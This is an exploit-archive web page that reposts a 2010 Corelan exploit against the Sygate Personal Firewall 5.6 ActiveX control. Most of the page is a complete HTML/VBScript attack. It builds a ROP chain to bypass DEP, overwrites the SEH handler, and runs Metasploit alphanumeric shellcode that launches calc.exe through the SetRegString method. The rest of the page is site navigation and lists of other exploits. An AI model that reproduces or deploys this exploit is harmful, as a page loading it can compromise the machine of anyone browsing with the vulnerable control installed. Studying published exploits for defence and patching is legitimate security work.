首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Sygate Personal Firewall 5.6 build 2808 ActiveX with DEP bypass
来源:http://www.corelan.be:8800 作者:Lincoln 发布时间:2010-06-12  

<html>
<!--
        |------------------------------------------------------------------|
        |                         __               __                      |
        |   _________  ________  / /___ _____     / /____  ____ _____ ___  |
        |  / ___/ __ \/ ___/ _ \/ / __ `/ __ \   / __/ _ \/ __ `/ __ `__ \ |
        | / /__/ /_/ / /  /  __/ / /_/ / / / /  / /_/  __/ /_/ / / / / / / |
        | \___/\____/_/   \___/_/\__,_/_/ /_/   \__/\___/\__,_/_/ /_/ /_/  |
        |                                                                  |
        |                                       http://www.corelan.be:8800 |
        |                                              security@corelan.be |
        |                                                                  |
        |-------------------------------------------------[ EIP Hunters ]--|
 
# Software      : Sygate Personal Firewall 5.6 build 2808 ActiveX w/ DEP bypass
# Author        : Lincoln
# Date       : June 11, 2010
# Reference     : http://www.corelan.be:8800/advisories.php?id=CORELAN-10-050
# OS            : Windows
# Tested on     : XP SP3 En (VirtualBox)
# Type of vuln  : SEH
# Greetz to     : Corelan Security Team
# http://www.corelan.be:8800/index.php/security/corelan-team-members/
#
# Script provided 'as is', without any warranty.
# Use for educational purposes only.
# Do not use this code to do anything illegal !
#
# Note : you are not allowed to edit/modify this code.
# If you do, Corelan cannot be held responsible for any damages this may cause.
#
#
# Bad Chars: 80-9f (makes for extra fun)
# Tested on IE 7/6 , nop slide used
#
#
-->

<object classid='clsid:D59EBAD7-AF87-4A5C-8459-D3F6B918E7C9' id='target' ></object>
<script language='vbscript'>

seh   = unescape("%13%16%47%06")  '#ADD ESP,46C # RETN


rop = rop + String(72, "D")   '#Junk
rop = rop + unescape("%19%16%47%06") '#Nop
rop = rop + unescape("%19%16%47%06") '#Nop
rop = rop + unescape("%19%16%47%06") '#Nop
rop = rop + unescape("%19%16%47%06") '#Nop
rop = rop + unescape("%19%16%47%06") '#Nop
rop = rop + unescape("%19%16%47%06") '#Nop
rop = rop + unescape("%19%16%47%06") '#Nop

'#edx
rop = rop + unescape("%33%b6%44%06") '#POP EBP # RETN
rop = rop + unescape("%01%c0%4b%06") 
rop = rop + unescape("%65%b9%47%06") '#MOV EDX,EBP # POP REGISTERS CHAIN #RETN

'#alignment     
rop = rop + unescape("%7c%bd%47%06") '#POP data into registers 
rop = rop + unescape("%49%50%45%06") 
rop = rop + unescape("%41%41%41%41") 
rop = rop + unescape("%ff%ff%ff%ff") 
rop = rop + unescape("%50%50%50%50") 

'#ebx
rop = rop + unescape("%b2%7d%48%06")    '#ADD EAX,80 # POP EBP # RETN
rop = rop + unescape("%41%41%41%41") '#Junk
rop = rop + unescape("%b2%7d%48%06")    '#ADD EAX,80 # POP EBP # RETN
rop = rop + unescape("%41%41%41%41") '#Junk
rop = rop + unescape("%b2%7d%48%06")    '#ADD EAX,80 # POP EBP # RETN
rop = rop + unescape("%41%41%41%41") '#Junk
rop = rop + unescape("%d9%c4%47%06") '#ADD EBX,EAX # PUSH 1 # POP EAX # RETN

'#ebp
rop = rop + unescape("%dd%c4%47%06") '#POP EAX # RETN
rop = rop + unescape("%1f%73%d0%cc")   
rop = rop + unescape("%ae%f5%47%06")    '#SUB EAX,ECX # RETN
rop = rop + unescape("%30%14%45%06") '#MOV EBP,EAX # CALL ESI

'#esi
rop = rop + unescape("%22%cd%46%06") '#POP ESI # RETN
rop = rop + unescape("%ff%ff%ff%ff") 

'#eax
rop = rop + unescape("%dd%c4%47%06") '#POP EAX # RETN
rop = rop + unescape("%63%72%d0%cc")   
rop = rop + unescape("%ae%f5%47%06")    '#SUB EAX,ECX # RETN

'#game over
rop = rop + unescape("%47%71%49%06") '#PUSHAD (throw it all on the stack baby!)


'[*] Using Msf::Encoder::Alpha2 with final size of 338 bytes cmd=calc.exe
sc = unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%49%49%49%49%49%49") & _
unescape("%49%49%49%49%49%49%49%49%49%48%49%49%51%5a%6a%45") & _
unescape("%58%30%41%31%50%41%42%6b%42%41%55%32%42%42%32%41") & _
unescape("%41%30%41%41%58%42%38%42%42%50%75%6d%39%39%6c%6d") & _
unescape("%38%57%34%77%70%67%70%33%30%4c%4b%63%75%75%6c%6c") & _
unescape("%4b%41%6c%75%55%64%38%55%51%4a%4f%4c%4b%42%6f%46") & _
unescape("%78%4e%6b%61%4f%77%50%65%51%78%6b%63%79%4c%4b%47") & _
unescape("%44%6e%6b%47%71%48%6e%65%61%59%50%6e%79%6c%6c%4f") & _
unescape("%74%4f%30%50%74%47%77%6a%61%5a%6a%54%4d%64%41%5a") & _
unescape("%62%68%6b%4a%54%55%6b%42%74%74%64%47%74%70%75%6b") & _
unescape("%55%6c%4b%61%4f%76%44%66%61%5a%4b%71%76%6c%4b%54") & _
unescape("%4c%72%6b%4c%4b%53%6f%77%6c%56%61%7a%4b%4e%6b%65") & _
unescape("%4c%6c%4b%77%71%38%6b%6b%39%43%6c%71%34%74%44%59") & _
unescape("%53%67%41%6f%30%63%54%6e%6b%63%70%70%30%4e%65%4b") & _
unescape("%70%61%68%36%6c%6c%4b%63%70%46%6c%4c%4b%54%30%77") & _
unescape("%6c%4c%6d%6e%6b%55%38%57%78%38%6b%36%69%6e%6b%6f") & _
unescape("%70%4e%50%73%30%75%50%55%50%6e%6b%33%58%77%4c%43") & _
unescape("%6f%50%31%59%66%65%30%33%66%6e%69%69%68%4f%73%4b") & _
unescape("%70%53%4b%42%70%30%68%4a%50%6e%6a%65%54%51%4f%52") & _
unescape("%48%6f%68%4b%4e%6c%4a%66%6e%33%67%4b%4f%6d%37%51") & _
unescape("%73%50%61%62%4c%70%63%56%4e%73%55%73%48%41%75%47") & _
unescape("%70%45")


junk  = String(2814, "D") '3128
mjunk = String(25000, "A")

arg1=1
arg2=1
arg3= rop + sc + junk + seh + mjunk
arg4="defaultV"
arg5="defaultV"

target.SetRegString arg1 ,arg2 ,arg3 ,arg4 ,arg5

</script>
<b><center>Sygate Personal Firewall 5.6 build 2808 ActiveX exploit w/ DEP bypass</b></center>
</html>


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Allwin MessageBoxA Shellcode
·DaLogin 2.2 (FCKeditor) Remote
·Nginx <= 0.7.65 / 0.8.39 (dev)
·Solarwinds 10.4.0.13 DOS
·Power Tab Editor v1.7 (Build 8
·Media Player Classic V1.3.1774
·nginx 0.8.36 Source Disclosure
·CP3 Studio PC Ver. Dos
·Adobe InDesign CS3 INDD File H
·Collabtive v0.6.3 Multiple Vul
·Safari 5.0 Remote Buffer OverF
·Litespeed Technologies Web Ser
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved